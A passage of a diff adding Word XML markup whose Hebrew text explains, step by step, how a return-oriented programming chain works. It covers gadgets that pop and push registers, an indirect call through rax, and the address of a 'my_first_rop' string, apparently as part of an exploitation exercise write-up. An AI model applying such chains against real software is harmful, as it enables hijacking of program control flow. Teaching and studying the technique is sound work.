+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מסעיף 3. נסביר את מה שקרה משורה 4 עד לשורה זו:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>לאחר שקפצנו ל-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“push %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rbp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> יידחף הערך שלו למחסנית שעל פי ההרצה יהיה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>0x0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> וידרוס ערכים שכבר לא משנים לנו.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">בפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“mov %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rbp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> נזיז את הערך של </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> לתוך </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rbp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. לאחר שחישבנו את הערך של </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> גילינו שהוא יהיה שווה ל-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>addr+13+8*2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> כאשר </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>addr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> היא הכתובת שבה מתחילה המחרוזת </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>my_first_rop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שתשמש אותנו בסופו של דבר.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ב-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“call *%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> נשמור את הערך הנוכחי של </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rip</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> במחסנית ונקפוץ לכתובת ש-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מכיל שהיא הכתובת של הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ב-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> נשים ב-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> את ה-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rip</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ש-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>call</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שם במחסנית והוא לא באמת רלוונטי עבורנו.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ב-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %r15”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> נשמור את הערך ש-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rbp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> דחף למחסנית שהוא ערך זבל שלא עוזר לנו.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">לבסוף נקפוץ לפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">שורה זו מכילה את הכתובת של הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מסעיף 3 שנרצה ש-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> יכיל.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">שורה זו מכילה את הכתובת של הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“push %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rbp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מסעיף 3 שנרצה להגיע אליה מ-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ret</w:t>
+      </w:r>
